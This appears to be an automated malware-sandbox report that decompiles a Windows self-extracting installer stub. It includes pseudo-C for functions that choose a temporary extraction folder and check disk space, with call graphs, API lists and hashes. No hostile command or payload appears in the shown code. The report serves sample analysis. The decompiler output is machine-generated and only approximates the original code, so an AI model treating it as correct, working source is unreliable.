                                                • Instruction ID: f0cb37a35a96ece251d30a0f100a8d67d2b915ce9935e5ad20f8509b6975852f
                                                • Opcode Fuzzy Hash: e89a0a6c817317aa7cfa1cad16990d42dce4fd89dc42f00cf16922d087538e9d
                                                • Instruction Fuzzy Hash: F951D2B192021DABDB209F60EC4DFFBF72CEB56790F0001B8BB49A6151DE719D69CA50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 232 2f55a0-2f55d9 call 2f468f LocalAlloc 235 2f55fd-2f560c call 2f468f 232->235 236 2f55db-2f55f1 call 2f44b9 call 2f6285 232->236 241 2f560e-2f5630 call 2f44b9 LocalFree 235->241 242 2f5632-2f5643 lstrcmpA 235->242 251 2f55f6-2f55f8 236->251 241->251 245 2f564b-2f5659 LocalFree 242->245 246 2f5645 242->246 249 2f565b-2f565d 245->249 250 2f5696-2f569c 245->250 246->245 255 2f565f-2f5667 249->255 256 2f5669 249->256 253 2f589f-2f58b5 call 2f6517 250->253 254 2f56a2-2f56a8 250->254 252 2f58b7-2f58c7 call 2f6ce0 251->252 253->252 254->253 258 2f56ae-2f56c1 GetTempPathA 254->258 255->256 259 2f566b-2f567a call 2f5467 255->259 256->259 263 2f56f3-2f5711 call 2f1781 258->263 264 2f56c3-2f56c9 call 2f5467 258->264 271 2f589b-2f589d 259->271 272 2f5680-2f5691 call 2f44b9 259->272 274 2f586c-2f5890 GetWindowsDirectoryA call 2f597d 263->274 275 2f5717-2f5729 GetDriveTypeA 263->275 270 2f56ce-2f56d0 264->270 270->271 276 2f56d6-2f56df call 2f2630 270->276 271->252 272->251 274->263 288 2f5896 274->288 278 2f572b-2f572e 275->278 279 2f5730-2f5740 GetFileAttributesA 275->279 276->263 289 2f56e1-2f56ed call 2f5467 276->289 278->279 282 2f5742-2f5745 278->282 279->282 283 2f577e-2f578f call 2f597d 279->283 286 2f576b 282->286 287 2f5747-2f574f 282->287 295 2f57b2-2f57bf call 2f2630 283->295 296 2f5791-2f579e call 2f2630 283->296 291 2f5771-2f5779 286->291 287->291 292 2f5751-2f5753 287->292 288->271 289->263 289->271 298 2f5864-2f5866 291->298 292->291 297 2f5755-2f5762 call 2f6952 292->297 307 2f57d3-2f57f8 call 2f658a GetFileAttributesA 295->307 308 2f57c1-2f57cd GetWindowsDirectoryA 295->308 296->286 306 2f57a0-2f57b0 call 2f597d 296->306 297->286 309 2f5764-2f5769 297->309 298->274 298->275 306->286 306->295 314 2f580a 307->314 315 2f57fa-2f5808 CreateDirectoryA 307->315 308->307 309->283 309->286 316 2f580d-2f580f 314->316 315->316 317 2f5827-2f585c SetFileAttributesA call 2f1781 call 2f5467 316->317 318 2f5811-2f5825 316->318 317->271 323 2f585e 317->323 318->298 323->298
                                                C-Code - Quality: 92%
                                                			E002F55A0(void* __eflags) {
                                                				signed int _v8;
                                                				char _v265;
                                                				char _v268;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t28;
                                                				int _t32;
                                                				int _t33;
                                                				int _t35;
                                                				signed int _t36;
                                                				signed int _t38;
                                                				int _t40;
                                                				int _t44;
                                                				long _t48;
                                                				int _t49;
                                                				int _t50;
                                                				signed int _t53;
                                                				int _t54;
                                                				int _t59;
                                                				char _t60;
                                                				int _t65;
                                                				char _t66;
                                                				int _t67;
                                                				int _t68;
                                                				int _t69;
                                                				int _t70;
                                                				int _t71;
                                                				struct _SECURITY_ATTRIBUTES* _t72;
                                                				int _t73;
                                                				CHAR* _t82;
                                                				CHAR* _t88;
                                                				void* _t103;
                                                				signed int _t110;
                                                
                                                				_t28 =  *0x2f8004; // 0x404cc811
                                                				_v8 = _t28 ^ _t110;
                                                				_t2 = E002F468F("RUNPROGRAM", 0, 0) + 1; // 0x1
                                                				_t109 = LocalAlloc(0x40, _t2);
                                                				if(_t109 != 0) {
                                                					_t82 = "RUNPROGRAM";
                                                					_t32 = E002F468F(_t82, _t109, 1);
                                                					__eflags = _t32;
                                                					if(_t32 != 0) {
                                                						_t33 = lstrcmpA(_t109, "<None>");
                                                						__eflags = _t33;
                                                						if(_t33 == 0) {
                                                							 *0x2f9a30 = 1;
                                                						}
                                                						LocalFree(_t109);
                                                						_t35 =  *0x2f8b3e; // 0x0
                                                						__eflags = _t35;
                                                						if(_t35 == 0) {
                                                							__eflags =  *0x2f8a24; // 0x0
                                                							if(__eflags != 0) {
                                                								L46:
                                                								_t101 = 0x7d2;
                                                								_t36 = E002F6517(_t82, 0x7d2, 0, E002F3210, 0, 0);
                                                								asm("sbb eax, eax");
                                                								_t38 =  ~( ~_t36);
                                                							} else {
                                                								__eflags =  *0x2f9a30; // 0x0
                                                								if(__eflags != 0) {
                                                									goto L46;
                                                								} else {
                                                									_t109 = 0x2f91e4;
                                                									_t40 = GetTempPathA(0x104, 0x2f91e4);
                                                									__eflags = _t40;
                                                									if(_t40 == 0) {
                                                										L19:
                                                										_push(_t82);
                                                										E002F1781( &_v268, 0x104, _t82, "A:\\");
                                                										__eflags = _v268 - 0x5a;
                                                										if(_v268 <= 0x5a) {
                                                											do {
                                                												_t109 = GetDriveTypeA( &_v268);
                                                												__eflags = _t109 - 6;
                                                												if(_t109 == 6) {
                                                													L22:
                                                													_t48 = GetFileAttributesA( &_v268);
                                                													__eflags = _t48 - 0xffffffff;
                                                													if(_t48 != 0xffffffff) {
                                                														goto L30;
                                                													} else {
                                                														goto L23;
                                                													}
                                                												} else {
                                                													__eflags = _t109 - 3;
                                                													if(_t109 != 3) {
                                                														L23:
                                                														__eflags = _t109 - 2;
                                                														if(_t109 != 2) {
                                                															L28:
                                                															_t66 = _v268;
                                                															goto L29;
                                                														} else {
                                                															_t66 = _v268;
                                                															__eflags = _t66 - 0x41;
                                                															if(_t66 == 0x41) {
                                                																L29:
                                                																_t60 = _t66 + 1;
                                                																_v268 = _t60;
                                                																goto L42;
                                                															} else {
                                                																__eflags = _t66 - 0x42;
                                                																if(_t66 == 0x42) {
                                                																	goto L29;
                                                																} else {
                                                																	_t68 = E002F6952( &_v268);
                                                																	__eflags = _t68;
                                                																	if(_t68 == 0) {
                                                																		goto L28;
                                                																	} else {
                                                																		__eflags = _t68 - 0x19000;
                                                																		if(_t68 >= 0x19000) {
                                                																			L30:
                                                																			_push(0);
                                                																			_t103 = 3;
                                                																			_t49 = E002F597D( &_v268, _t103, 1);
                                                																			__eflags = _t49;
                                                																			if(_t49 != 0) {
                                                																				L33:
                                                																				_t50 = E002F2630(0,  &_v268, 1);
                                                																				__eflags = _t50;
                                                																				if(_t50 != 0) {
                                                																					GetWindowsDirectoryA( &_v268, 0x104);
                                                																				}
                                                																				_t88 =  &_v268;
                                                																				E002F658A(_t88, 0x104, "msdownld.tmp");
                                                																				_t53 = GetFileAttributesA( &_v268);
                                                																				__eflags = _t53 - 0xffffffff;
                                                																				if(_t53 != 0xffffffff) {
                                                																					_t54 = _t53 & 0x00000010;
                                                																					__eflags = _t54;
                                                																				} else {
                                                																					_t54 = CreateDirectoryA( &_v268, 0);
                                                																				}
                                                																				__eflags = _t54;
                                                																				if(_t54 != 0) {
                                                																					SetFileAttributesA( &_v268, 2);
                                                																					_push(_t88);
                                                																					_t109 = 0x2f91e4;
                                                																					E002F1781(0x2f91e4, 0x104, _t88,  &_v268);
                                                																					_t101 = 1;
                                                																					_t59 = E002F5467(0x2f91e4, 1, 0);
                                                																					__eflags = _t59;
                                                																					if(_t59 != 0) {
                                                																						goto L45;
                                                																					} else {
                                                																						_t60 = _v268;
                                                																						goto L42;
                                                																					}
                                                																				} else {
                                                																					_t60 = _v268 + 1;
                                                																					_v265 = 0;
                                                																					_v268 = _t60;
                                                																					goto L42;
                                                																				}
                                                																			} else {
                                                																				_t65 = E002F2630(0,  &_v268, 1);
                                                																				__eflags = _t65;
                                                																				if(_t65 != 0) {
                                                																					goto L28;
                                                																				} else {
                                                																					_t67 = E002F597D( &_v268, 1, 1, 0);
                                                																					__eflags = _t67;
                                                																					if(_t67 == 0) {
                                                																						goto L28;
                                                																					} else {
                                                																						goto L33;
                                                																					}
                                                																				}
                                                																			}
                                                																		} else {
                                                																			goto L28;
                                                																		}
                                                																	}
                                                																}
                                                															}
                                                														}
                                                													} else {
                                                														goto L22;
                                                													}
                                                												}
                                                												goto L47;
                                                												L42:
                                                												__eflags = _t60 - 0x5a;
                                                											} while (_t60 <= 0x5a);
                                                										}
                                                										goto L43;
                                                									} else {
                                                										_t101 = 1;
                                                										_t69 = E002F5467(0x2f91e4, 1, 3); // executed
                                                										__eflags = _t69;
                                                										if(_t69 != 0) {
                                                											goto L45;
                                                										} else {
                                                											_t82 = 0x2f91e4;
                                                											_t70 = E002F2630(0, 0x2f91e4, 1);
                                                											__eflags = _t70;
                                                											if(_t70 != 0) {
                                                												goto L19;
                                                											} else {
                                                												_t101 = 1;
                                                												_t82 = 0x2f91e4;
                                                												_t71 = E002F5467(0x2f91e4, 1, 1);
                                                												__eflags = _t71;
                                                												if(_t71 != 0) {
                                                													goto L45;
                                                												} else {
                                                													do {
                                                														goto L19;
                                                														L43:
                                                														GetWindowsDirectoryA( &_v268, 0x104);
                                                														_push(4);
                                                														_t101 = 3;
                                                														_t82 =  &_v268;
                                                														_t44 = E002F597D(_t82, _t101, 1);
                                                														__eflags = _t44;
                                                													} while (_t44 != 0);
                                                													goto L2;
                                                												}
                                                											}
                                                										}
                                                									}
                                                								}
                                                							}
                                                						} else {
                                                							__eflags = _t35 - 0x5c;
                                                							if(_t35 != 0x5c) {
                                                								L10:
                                                								_t72 = 1;
                                                							} else {
                                                								__eflags =  *0x2f8b3f - _t35; // 0x0
                                                								_t72 = 0;
                                                								if(__eflags != 0) {
                                                									goto L10;
                                                								}
                                                							}
                                                							_t101 = 0;
                                                							_t73 = E002F5467(0x2f8b3e, 0, _t72);
                                                							__eflags = _t73;
                                                							if(_t73 != 0) {
                                                								L45:
                                                								_t38 = 1;
                                                							} else {
                                                								_t101 = 0x4be;
                                                								E002F44B9(0, 0x4be, 0, 0, 0x10, 0);
                                                								goto L2;
                                                							}
                                                						}
                                                					} else {
                                                						_t101 = 0x4b1;
                                                						E002F44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                						LocalFree(_t109);
                                                						 *0x2f9124 = 0x80070714;
                                                						goto L2;
                                                					}
                                                				} else {
                                                					_t101 = 0x4b5;
                                                					E002F44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                					 *0x2f9124 = E002F6285();
                                                					L2:
                                                					_t38 = 0;
                                                				}
                                                				L47:
                                                				return E002F6CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
                                                			}





































                                                0x002f55ab
                                                0x002f55b2
                                                0x002f55c9
                                                0x002f55d5
                                                0x002f55d9
                                                0x002f5600
                                                0x002f5605
                                                0x002f560a
                                                0x002f560c
                                                0x002f5638
                                                0x002f5641
                                                0x002f5643
                                                0x002f5645
                                                0x002f5645
                                                0x002f564c
                                                0x002f5652
                                                0x002f5657
                                                0x002f5659
                                                0x002f5696
                                                0x002f569c
                                                0x002f589f
                                                0x002f58a7
                                                0x002f58ac
                                                0x002f58b3
                                                0x002f58b5
                                                0x002f56a2
                                                0x002f56a2
                                                0x002f56a8
                                                0x00000000
                                                0x002f56ae
                                                0x002f56ae
                                                0x002f56b9
                                                0x002f56bf
                                                0x002f56c1
                                                0x002f56f3
                                                0x002f56f3
                                                0x002f5705
                                                0x002f570a
                                                0x002f5711
                                                0x002f5717
                                                0x002f5724
                                                0x002f5726
                                                0x002f5729
                                                0x002f5730
                                                0x002f5737
                                                0x002f573d
                                                0x002f5740
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x002f572b
                                                0x002f572b
                                                0x002f572e
                                                0x002f5742
                                                0x002f5742
                                                0x002f5745
                                                0x002f576b
                                                0x002f576b
                                                0x00000000
                                                0x002f5747
                                                0x002f5747
                                                0x002f574d
                                                0x002f574f
                                                0x002f5771
                                                0x002f5771
                                                0x002f5773
                                                0x00000000
                                                0x002f5751
                                                0x002f5751
                                                0x002f5753
                                                0x00000000
                                                0x002f5755
                                                0x002f575b
                                                0x002f5760
                                                0x002f5762
                                                0x00000000
                                                0x002f5764
                                                0x002f5764
                                                0x002f5769
                                                0x002f577e
                                                0x002f577e
                                                0x002f5781
                                                0x002f5788
                                                0x002f578d
                                                0x002f578f
                                                0x002f57b2
                                                0x002f57b8
                                                0x002f57bd
                                                0x002f57bf
                                                0x002f57cd
                                                0x002f57cd
                                                0x002f57dd
                                                0x002f57e3
                                                0x002f57ef
                                                0x002f57f5
                                                0x002f57f8
                                                0x002f580a
                                                0x002f580a
                                                0x002f57fa
                                                0x002f5802
                                                0x002f5802
                                                0x002f580d
                                                0x002f580f
                                                0x002f5830
                                                0x002f5836
                                                0x002f583d
                                                0x002f584b
                                                0x002f5851
                                                0x002f5855
                                                0x002f585a
                                                0x002f585c
                                                0x00000000
                                                0x002f585e
                                                0x002f585e
                                                0x00000000
                                                0x002f585e
                                                0x002f5811
                                                0x002f5817
                                                0x002f5819
                                                0x002f581f
                                                0x00000000
                                                0x002f581f
                                                0x002f5791
                                                0x002f5797
                                                0x002f579c
                                                0x002f579e
                                                0x00000000
                                                0x002f57a0
                                                0x002f57a9
                                                0x002f57ae
                                                0x002f57b0
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x002f57b0
                                                0x002f579e
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x002f5769
                                                0x002f5762
                                                0x002f5753
                                                0x002f574f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x002f572e
                                                0x00000000
                                                0x002f5864
                                                0x002f5864
                                                0x002f5864
                                                0x002f5717
                                                0x00000000
                                                0x002f56c3
                                                0x002f56c5
                                                0x002f56c9
                                                0x002f56ce
                                                0x002f56d0
                                                0x00000000
                                                0x002f56d6
                                                0x002f56d6
                                                0x002f56d8
                                                0x002f56dd
                                                0x002f56df
                                                0x00000000
                                                0x002f56e1
                                                0x002f56e2
                                                0x002f56e4
                                                0x002f56e6
                                                0x002f56eb
                                                0x002f56ed
                                                0x00000000
                                                0x002f56f3
                                                0x002f56f3
                                                0x00000000
                                                0x002f586c
                                                0x002f5878
                                                0x002f587e
                                                0x002f5882
                                                0x002f5883
                                                0x002f5889
                                                0x002f588e
                                                0x002f588e
                                                0x00000000
                                                0x002f5896
                                                0x002f56ed
                                                0x002f56df
                                                0x002f56d0
                                                0x002f56c1
                                                0x002f56a8
                                                0x002f565b
                                                0x002f565b
                                                0x002f565d
                                                0x002f5669
                                                0x002f5669
                                                0x002f565f
                                                0x002f565f
                                                0x002f5665
                                                0x002f5667
                                                0x00000000
                                                0x00000000
                                                0x002f5667
                                                0x002f566c
                                                0x002f5673
                                                0x002f5678
                                                0x002f567a
                                                0x002f589b
                                                0x002f589b
                                                0x002f5680
                                                0x002f5685
                                                0x002f568c
                                                0x00000000
                                                0x002f568c
                                                0x002f567a
                                                0x002f560e
                                                0x002f5613
                                                0x002f561a
                                                0x002f5620
                                                0x002f5626
                                                0x00000000
                                                0x002f5626
                                                0x002f55db
                                                0x002f55e0
                                                0x002f55e7
                                                0x002f55f1
                                                0x002f55f6
                                                0x002f55f6
                                                0x002f55f6
                                                0x002f58b7
                                                0x002f58c7

                                                APIs
                                                  • Part of subcall function 002F468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 002F46A0
                                                  • Part of subcall function 002F468F: SizeofResource.KERNEL32(00000000,00000000,?,002F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002F46A9
                                                  • Part of subcall function 002F468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 002F46C3
                                                  • Part of subcall function 002F468F: LoadResource.KERNEL32(00000000,00000000,?,002F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002F46CC
                                                  • Part of subcall function 002F468F: LockResource.KERNEL32(00000000,?,002F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002F46D3
                                                  • Part of subcall function 002F468F: memcpy_s.MSVCRT ref: 002F46E5
                                                  • Part of subcall function 002F468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 002F46EF
                                                • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 002F55CF
                                                • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 002F5638
                                                • LocalFree.KERNEL32(00000000), ref: 002F564C
                                                • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 002F5620
                                                  • Part of subcall function 002F44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 002F4518
                                                  • Part of subcall function 002F44B9: MessageBoxA.USER32(?,?,lega,00010010), ref: 002F4554
                                                  • Part of subcall function 002F6285: GetLastError.KERNEL32(002F5BBC), ref: 002F6285
                                                • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 002F56B9
                                                • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 002F571E
                                                • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 002F5737
                                                • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 002F57CD
                                                • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 002F57EF
                                                • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 002F5802
                                                  • Part of subcall function 002F2630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 002F2654
                                                • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 002F5830
                                                  • Part of subcall function 002F6517: FindResourceA.KERNEL32(002F0000,000007D6,00000005), ref: 002F652A
                                                  • Part of subcall function 002F6517: LoadResource.KERNEL32(002F0000,00000000,?,?,002F2EE8,00000000,002F19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 002F6538
                                                  • Part of subcall function 002F6517: DialogBoxIndirectParamA.USER32(002F0000,00000000,00000547,002F19E0,00000000), ref: 002F6557
                                                  • Part of subcall function 002F6517: FreeResource.KERNEL32(00000000,?,?,002F2EE8,00000000,002F19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 002F6560
                                                • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 002F5878
                                                  • Part of subcall function 002F597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 002F59A8
                                                  • Part of subcall function 002F597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 002F59AF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true
                                                • Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd
                                                Similarity
                                                • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP003.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                • API String ID: 2436801531-3896789798
                                                • Opcode ID: b719c4f3f089e94db522993fe665092ae402d3136b3dad8a5e8fa1de3b2cb423
                                                • Instruction ID: 49e142827dba413652187053af3df6a92bbe20dce1392b2c7fcb730888014bcd
                                                • Opcode Fuzzy Hash: b719c4f3f089e94db522993fe665092ae402d3136b3dad8a5e8fa1de3b2cb423
                                                • Instruction Fuzzy Hash: EC811C70A2492D9ADB24AF74AC59BFAF29D9B513D0F400075F786D2191DFB08DE1CE50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 324 2f597d-2f59b9 GetCurrentDirectoryA SetCurrentDirectoryA 325 2f59dd-2f5a1b GetDiskFreeSpaceA 324->325 326 2f59bb-2f59d8 call 2f44b9 call 2f6285 324->326 327 2f5ba1-2f5bde memset call 2f6285 GetLastError FormatMessageA 325->327 328 2f5a21-2f5a4a MulDiv 325->328 345 2f5c05-2f5c14 call 2f6ce0 326->345 337 2f5be3-2f5bfc call 2f44b9 SetCurrentDirectoryA 327->337 328->327 331 2f5a50-2f5a6c GetVolumeInformationA 328->331 334 2f5a6e-2f5ab0 memset call 2f6285 GetLastError FormatMessageA 331->334 335 2f5ab5-2f5aca SetCurrentDirectoryA 331->335 334->337 339 2f5acc-2f5ad1 335->339 351 2f5c02 337->351 343 2f5ad3-2f5ad8 339->343 344 2f5ae2-2f5ae4 339->344 343->344 347 2f5ada-2f5ae0 343->347 349 2f5ae7-2f5af8 344->349 350 2f5ae6 344->350 347->339 347->344 353 2f5af9-2f5afb 349->353 350->349 354 2f5c04 351->354 355 2f5afd-2f5b03 353->355 356 2f5b05-2f5b08 353->356 354->345 355->353 355->356 357 2f5b0a-2f5b1b call 2f44b9 356->357 358 2f5b20-2f5b27 356->358 357->351 360 2f5b29-2f5b33 358->360 361 2f5b52-2f5b5b 358->361 360->361 363 2f5b35-2f5b50 360->363 364 2f5b62-2f5b6d 361->364 363->364 365 2f5b6f-2f5b74 364->365 366 2f5b76-2f5b7d 364->366 367 2f5b85 365->367 368 2f5b7f-2f5b81 366->368 369 2f5b83 366->369 370 2f5b87-2f5b94 call 2f268b 367->370 371 2f5b96-2f5b9f 367->371 368->367 369->367 370->354 371->354
                                                C-Code - Quality: 96%
                                                			E002F597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
                                                				signed int _v8;
                                                				char _v16;
                                                				char _v276;
                                                				char _v788;
                                                				long _v792;
                                                				long _v796;
                                                				long _v800;
                                                				signed int _v804;
                                                				long _v808;
                                                				int _v812;
                                                				long _v816;
                                                				long _v820;
                                                				void* __ebx;
                                                				void* __esi;
                                                				signed int _t46;
                                                				int _t50;
                                                				signed int _t55;
                                                				void* _t66;
                                                				int _t69;
                                                				signed int _t73;
                                                				signed short _t78;
                                                				signed int _t87;
                                                				signed int _t101;
                                                				int _t102;
                                                				unsigned int _t103;
                                                				unsigned int _t105;
                                                				signed int _t111;
                                                				long _t112;
                                                				signed int _t116;
                                                				CHAR* _t118;
                                                				signed int _t119;
                                                				signed int _t120;
                                                
                                                				_t114 = __edi;
                                                				_t46 =  *0x2f8004; // 0x404cc811
                                                				_v8 = _t46 ^ _t120;
                                                				_v804 = __edx;
                                                				_t118 = __ecx;
                                                				GetCurrentDirectoryA(0x104,  &_v276);
                                                				_t50 = SetCurrentDirectoryA(_t118); // executed
                                                				if(_t50 != 0) {
                                                					_push(__edi);
                                                					_v796 = 0;
                                                					_v792 = 0;
                                                					_v800 = 0;
                                                					_v808 = 0;
                                                					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
                                                					__eflags = _t55;
                                                					if(_t55 == 0) {
                                                						L29:
                                                						memset( &_v788, 0, 0x200);
                                                						 *0x2f9124 = E002F6285();
                                                						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                						_t110 = 0x4b0;
                                                						L30:
                                                						__eflags = 0;
                                                						E002F44B9(0, _t110, _t118,  &_v788, 0x10, 0);
                                                						SetCurrentDirectoryA( &_v276);
                                                						L31:
                                                						_t66 = 0;
                                                						__eflags = 0;
                                                						L32:
                                                						_pop(_t114);
                                                						goto L33;
                                                					}
                                                					_t69 = _v792 * _v796;
                                                					_v812 = _t69;
                                                					_t116 = MulDiv(_t69, _v800, 0x400);
                                                					__eflags = _t116;
                                                					if(_t116 == 0) {
                                                						goto L29;
                                                					}
                                                					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
                                                					__eflags = _t73;
                                                					if(_t73 != 0) {
                                                						SetCurrentDirectoryA( &_v276); // executed
                                                						_t101 =  &_v16;
                                                						_t111 = 6;
                                                						_t119 = _t118 - _t101;
                                                						__eflags = _t119;
                                                						while(1) {
                                                							_t22 = _t111 - 4; // 0x2
                                                							__eflags = _t22;
                                                							if(_t22 == 0) {
                                                								break;
                                                							}
                                                							_t87 =  *((intOrPtr*)(_t119 + _t101));
                                                							__eflags = _t87;
                                                							if(_t87 == 0) {
                                                								break;
                                                							}
                                                							 *_t101 = _t87;
                                                							_t101 = _t101 + 1;
                                                							_t111 = _t111 - 1;
                                                							__eflags = _t111;
                                                							if(_t111 != 0) {
                                                								continue;
                                                							}
                                                							break;
                                                						}
                                                						__eflags = _t111;
                                                						if(_t111 == 0) {
                                                							_t101 = _t101 - 1;
                                                							__eflags = _t101;
                                                						}
                                                						 *_t101 = 0;
                                                						_t112 = 0x200;
                                                						_t102 = _v812;
                                                						_t78 = 0;
                                                						_t118 = 8;
                                                						while(1) {
                                                							__eflags = _t102 - _t112;
                                                							if(_t102 == _t112) {
                                                								break;
                                                							}
                                                							_t112 = _t112 + _t112;
                                                							_t78 = _t78 + 1;
                                                							__eflags = _t78 - _t118;
                                                							if(_t78 < _t118) {
                                                								continue;
                                                							}
                                                							break;
                                                						}
                                                						__eflags = _t78 - _t118;
                                                						if(_t78 != _t118) {
                                                							__eflags =  *0x2f9a34 & 0x00000008;
                                                							if(( *0x2f9a34 & 0x00000008) == 0) {
                                                								L20:
                                                								_t103 =  *0x2f9a38; // 0x0
                                                								_t110 =  *((intOrPtr*)(0x2f89e0 + (_t78 & 0x0000ffff) * 4));
                                                								L21:
                                                								__eflags = (_v804 & 0x00000003) - 3;
                                                								if((_v804 & 0x00000003) != 3) {
                                                									__eflags = _v804 & 0x00000001;
                                                									if((_v804 & 0x00000001) == 0) {
                                                										__eflags = _t103 - _t116;
                                                									} else {
                                                										__eflags = _t110 - _t116;
                                                									}
                                                								} else {
                                                									__eflags = _t103 + _t110 - _t116;
                                                								}
                                                								if(__eflags <= 0) {
                                                									 *0x2f9124 = 0;
                                                									_t66 = 1;
                                                								} else {
                                                									_t66 = E002F268B(_a4, _t110, _t103,  &_v16);
                                                								}
                                                								goto L32;
                                                							}
                                                							__eflags = _v816 & 0x00008000;
                                                							if((_v816 & 0x00008000) == 0) {
                                                								goto L20;
                                                							}
                                                							_t105 =  *0x2f9a38; // 0x0
                                                							_t110 =  *((intOrPtr*)(0x2f89e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0x2f89e0 + (_t78 & 0x0000ffff) * 4));
                                                							_t103 = (_t105 >> 2) +  *0x2f9a38;
                                                							goto L21;
                                                						}
                                                						_t110 = 0x4c5;
                                                						E002F44B9(0, 0x4c5, 0, 0, 0x10, 0);
                                                						goto L31;
                                                					}
                                                					memset( &_v788, 0, 0x200);
                                                					 *0x2f9124 = E002F6285();
                                                					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                					_t110 = 0x4f9;
                                                					goto L30;
                                                				} else {
                                                					_t110 = 0x4bc;
                                                					E002F44B9(0, 0x4bc, 0, 0, 0x10, 0);
                                                					 *0x2f9124 = E002F6285();
                                                					_t66 = 0;
                                                					L33:
                                                					return E002F6CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
                                                				}
                                                			}



































                                                0x002f597d
                                                0x002f5988
                                                0x002f598f
                                                0x002f599a
                                                0x002f59a6
                                                0x002f59a8
                                                0x002f59af
                                                0x002f59b9
                                                0x002f59dd
                                                0x002f59e4
                                                0x002f59f1
                                                0x002f59fe
                                                0x002f5a0b
                                                0x002f5a13
                                                0x002f5a19
                                                0x002f5a1b
                                                0x002f5ba1
                                                0x002f5baf
                                                0x002f5bbd
                                                0x002f5bd8
                                                0x002f5bde
                                                0x002f5be3
                                                0x002f5bec
                                                0x002f5bf0
                                                0x002f5bfc
                                                0x002f5c02
                                                0x002f5c02
                                                0x002f5c02
                                                0x002f5c04
                                                0x002f5c04
                                                0x00000000
                                                0x002f5c04
                                                0x002f5a27
                                                0x002f5a3a
                                                0x002f5a46
                                                0x002f5a48
                                                0x002f5a4a
                                                0x00000000
                                                0x00000000
                                                0x002f5a64
                                                0x002f5a6a
                                                0x002f5a6c
                                                0x002f5abc
                                                0x002f5ac2
                                                0x002f5ac9
                                                0x002f5aca
                                                0x002f5aca
                                                0x002f5acc
                                                0x002f5acc
                                                0x002f5acf
                                                0x002f5ad1
                                                0x00000000
                                                0x00000000
                                                0x002f5ad3
                                                0x002f5ad6
                                                0x002f5ad8
                                                0x00000000
                                                0x00000000
                                                0x002f5ada
                                                0x002f5adc
                                                0x002f5add
                                                0x002f5add
                                                0x002f5ae0
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x002f5ae0
                                                0x002f5ae2
                                                0x002f5ae4
                                                0x002f5ae6
                                                0x002f5ae6
                                                0x002f5ae6
                                                0x002f5ae9
                                                0x002f5aeb
                                                0x002f5af0
                                                0x002f5af6
                                                0x002f5af8
                                                0x002f5af9
                                                0x002f5af9
                                                0x002f5afb
                                                0x00000000
                                                0x00000000
                                                0x002f5afd
                                                0x002f5aff
                                                0x002f5b00
                                                0x002f5b03
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x002f5b03
                                                0x002f5b05
                                                0x002f5b08
                                                0x002f5b20
                                                0x002f5b27
